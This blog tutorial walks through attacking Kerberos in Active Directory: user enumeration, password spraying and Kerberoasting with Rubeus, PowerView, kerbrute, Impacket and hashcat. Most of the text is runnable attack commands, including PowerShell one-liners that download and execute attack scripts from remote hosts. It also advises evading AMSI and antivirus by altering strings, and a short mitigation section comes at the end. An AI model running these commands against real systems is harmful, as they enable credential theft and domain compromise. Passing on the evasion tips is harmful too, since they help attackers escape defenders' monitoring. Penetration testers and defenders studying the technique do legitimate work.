Kerberoasting Simplified

kerberoasting simplified
All Blog

Introduction

As Kerberos is an authentication protocol it is possible to perform brute-force attacks against it (providing we are careful). Kerberos brute-force has a lot of advantages for brute-forcing vs other protocols.

  • Kerberos indicates if you are using a CORRECT USERNAME but INCORRECT PASSWORD there we can Enumerate Users by sending a user list with bogus passwords. This will tell us if the usernames are correct or not. Great for User Enumeration.
  • A Domain Joined Account is not required, only access to the KDC
  • User Log-on Failures are not logged as the traditional Logon Failure you get with RDP Brute Force etc (Event ID: 4625) instead it is a Kerberos Pre-Auth Failure (4771) not ideal but certainly better than 4625

Ps: Be careful when Brute forcing/Enumerating as accounts can still be locked out, I recommend you treat this as a password spray more than an aggressive brute force.

To provide a brief overview I want to summarize the common Kerberos terminologies you may found being thrown about.

Server/Client Terminologies:

  • Client Machine – Machine who wants to access a service that supports Kerberos authentication.
  • Service Machine – Server/Computer hosting “Service” that supports Kerberos authentication
  • KDC (Key Distribution Centre) – The KDC is a very very important part of an Active Directory infrastructure as it is responsible for authenticating and distributing tickets. In AC Environments the KDC is installed on the Domain Controller (DC)
  • SPN (Service Principal Name) – This is the name of the service, sometimes you may have a user account with the SPN attribute configured which defines it as a service account. An example of an SPN would be.
    • CIFS/SERVERNAME-2016RDS.certcube.local
    • MSSQL/MSSQLSERVER.certcube.local

Ticket Terminologies:

  • Ticket Granting Ticket (TGT) – This is a ticket assigned on a per-user basic that each user uses to authenticate to the KDC with and issues requests for TGS ticket aka Service Tickets
  • Ticket Granting Server (TGS) – A authentication subset of the KDC that issues Service Tickets after verifying an end user’s TGT and if they have access to the requested resource.
  • Service Ticket (ST) – This is a ticket granted to you by the **TGS **for authentication purposes against services.

From Windows bruteforce way

Here we find ourselves again… Truthfully I only know of one way to brute-force Kerberos on Windows using…. drum-roll please. Rubeus surprise surprise… That being said the brute module is not part of the core Rubeus repo and is instead a fork by Zer1to

https://github.com/Zer1t0/Rubeus

Rebeus

Rubeus is effectively a Kerberos attack tool which we will cover a lot in this article that is developed in C#/.NET meaning it is a lot harder for defenders to detect it it’s reflectively loaded using something like Cobalt’s execute-assembly or SILENTTRINITY You can also reflectively load it from PowerShell but I will be covering .NET in greater detail in a future article.

https://github.com/GhostPack/Rubeus

As we have discussed Rebeus loads in this article already under Kerberoasting and AS REP I will jump straight to the chase.

We can carry out the brute force with the below syntax (Has to be Zer1to’s Fork)

PS C:\Users\m0chan> .\Rubeus.exe brute /users:usernames.txt /passwords:pass.txt /domain:certcube.local /outfile:brutepasswords.txt

The brute force module is really clever as if you crack a Username and Password combo it will automatically request a and save a TGT which you can inject into your current session to impersonate that user.

From Linux bruteforce way

Okay so surprisingly in my time and for the first time in this article I have actually had a easier experience enumerate Kerberos users from Linux and Brute forcing in comparison to Windows.

Let’s first talk about nMap

nMap

I am sure we have all heard of nMap, it’s probably the most used InfoSec tool used. Period.

Now nMap has a really nice script that allows us to enumerate users with krb5-enum-users This is super useful as we do not to have access to the domain only access to the KDC

The syntax for krb5-enum-users is as follows

nmap -verbose 4 -p 88 --script krb5-enum-users --script-args krb5-enum-users-realm='kerbrealm',userdb=user.txt <dc ip>

kerbrute.py

There is a great script developed by TarlogicSecurity entitled kerbrute.py that uses Impacket Libaries to to brute force and enumerate Kerberos users.

https://github.com/TarlogicSecurity/kerbrute

[email protected]:/scripts/> python kerbrute.py -domain certcube.local -users usernames.txt -passwords pass.txt -outputfile foundusers.txt

From Windows Inside in the Domain

There are numerous ways to enumerate service accounts and find Kerberoast targets so I will cover a few below, both from Windows Machines & Linux Machines.

Powerview

The First will be PowerView.ps1 – If you have not heard of PowerView.ps1 by now and you are researching Kerberos attacks then you need to go back a little…

PowerView is an insanely powerful .ps1 created by Harmj0y which makes Enumerating & Exploiting AD Environments with PowerShell extremely easy. Even though Powershell is extremely monitored in this day and age by defenders it is still highly useful.

https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1

Enumeration

First let’s import PowerView.ps1 into Memory with

IEX (New-Object Net.WebClient).DownloadString('http://werbserver:80/PowerView.ps1')

Of course AMSI will probably catch this on WIN10 1803 but I will leave evasion upto yourselfs. There are numerous bypasses in my h4cks Repo and numerous out there online. AMSI is just string detection so it’s easy to slip past.

Now with PowerView in memory on a Domain-Joined Machine, we can simply run

Get-DomainUser -SPN

or via default built-in tool with user

setspn.exe -S "http://certcube.local" <userdomain>

The Get-DomainUser the function also supports the switch which allows you to pass a separate credential through. For ex.

$secpasswd = ConvertTo-SecureString 'pass' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('certcube\user', $secpasswd)

Get-DomainUser -SPN -Credential $cred

That’s it! It will return all users with SPN Value set.

or in Specific user case

Set-DomainObject -Identity newuserwhomyouwantticket -SET @{serviceprincipalname=’citis/uafserver’}

Exploit

Now with the target service accounts in our scopes we can actually request a ticket for cracking which couldn’t be easier with PowerView.ps1

Just simply run the below command

Get-DomainSPNTicket -SPN <spn> -OutputFormat hashcat -Credential $cred

This will return a SPN Ticket encrypted with the NTLM hash of the target account. Bare in mind here I choose Hashcat over John as I use a Nvidia cracking rig but works way way better with Hashcat.

Now we can simply crack with something like

hashcat64.exe -a -m 13100 SPN.hash /wordlists/rockyou.txt

Of course this is as simple cracking attack as it’s just against a simple wordlist but if this was in the real world you would through rule sets and much more probable wordlists into the mix.

Rubeus

Second up we have Rubeus which is a relatively new tool developed and released by the wizards at SpectreOps. Without them the hacking community wouldn’t be the same.

Enumeration

Now by default, I don’t believe Rubeus has an Enumerate feature that simply enumerates users with the SPN Value set but truthfully that’s not the hard part when it comes to Kerberoasting, with a little bit of Powershell / LDAP Magic you can find what you’re looking for. Below are some examples.

get-aduser -filter {AdminCount -eq 1} -prop * | select name,created,passwordlastset,lastlogondate
dsquery * "ou=domain controllers,dc=yourdomain,dc=com" -filter "(&(objectcategory=computer)
(servicePrincipalName=*))" -attr distinguishedName servicePrincipalName > spns.txt

There are more techniques out there such as Get-DomainUser -SPN as talked about above and a lot of other ways that I will leave to your imagination.

Now we are armed with target accounts let’s boot up Rubeus

Exploit

To get Rubeus you will actually need Visual Studio 2017 or anything that can compile .NET. In my case I use Visual Studio and build myself an assembly. Luckily at the moment the default build of Rubeus is only detected by one AV vendor on Virus Total however if your AV is flagging it just change some strings and comments and rebuild the project and your AV will shut up. That’s the beauty of open-source C# / .NET Projects, much easier to circumvent anti-virus solutions.

Armed with out assembly/exe we can simply drop it on the target Domain-Joined Machine in the context of a domain user and start Roasting.

Rubeus Github has an amazing explanation on all it’s features and it’s ability to target specific OU's Users etc etc so I will try not to copy it word-for-word but merely show it’s capabilities.

First we can try to Roast all Users in the Current Domain (May be Noise)

PS C:\Users> .\Rubeus kerberoast

Kerberoast All Users in a Specific OU (Good if Organization has all Service Accounts in a Specific OU)

PS C:\Users > .\Rubeus kerberoast /user:domainuser /output:hashcat /outfile:file.txt

This may generate a lot of Output so we can Output all the Hashes to a file for easier Management and Cracking.

/outfile:C:\Temp\TotallyNotHashes.txt

Roasting a Specific Users or SPN

PS C:\Users> .\Rubeus kerberoast /user:mssqlservice

PS C:\Users> .\Rubeus kerberoast /spn:MSSQLSvc/SQL.certcube.local

There is also the ability to Roast users in a foreign trust domain providing the trust relationships allow you but you can check out the Rubeus Repo for full explanation on that. It’s really cool.

Invoke-Kerberoast.ps1

The final script I will talk about in the Windows Section is Invoke-Kerberoast.ps1 which isn’t nearly as powerful as Rubeus or Powerview hence why I will not split it up into Enumeration/Exploit like previous sections.

Invoke-Kerberoast.ps1. can be Invoked and executed using the below one-liner

PS C:\Temp > IEX(new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1");Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

#Download Invoke-Kerberoast.ps1 into Memory (AMSI May Flag)
IEX(new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")

#Invoke-Kerberoast and Output to Hashcat Format

Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

From Linux

Kerberoasting from Linux is a little but different as we are most likely not authenticated to the domain in anyway so will have to pass a stolen Kerberos ticket through for authentication or domain credentials.

In my experience I have found Kerberoasting from a Domain-Joined Machine is way way easier and typically hassle free however sometime we don’t have the option.

To enumerate Users with SPN value set we can use one of Impackets great scripts GetUserSPN's.py

https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py

If you haven’t heard of Impacket by now it’s a collection of python scripts for attacking Windows and has some seriously dangerous scripts in it’s repo.

Armed with GetUserSPNs.py and a already pwned Domain Users credentials we can simply run the below

[email protected]:/scripts/> python GetUserSPNs.py certcube/pwneduser:pwnedcreds -outputfile hashes.kerberoast

This outputted file can now be sent to Hashcat to crack, there are alternative means to cracking on Linux but in all my time Hacking I have never once had a good time trying to crack on Linux. I find Hashcat on a Windows machine with NVIDIA cards is the best route (personally).

Mitigation / Defending against Kerberoast

The most effective technique of defending against this is of course to make sure Service Accounts have extremely long passwords, 32 of extremely high complexity.

In terms of detecting Kerberoast it can be quite tricky as it’s normal activity for TGS tickets to be requested however you can enable Audit Kerberos Service Ticket Operations under Account Logon to log TGS ticket requests.

However as this is normal operation you will get ALOT ALOT of Event 4769 & Event 4770 alerts

Leave a Reply

Your email address will not be published. Required fields are marked *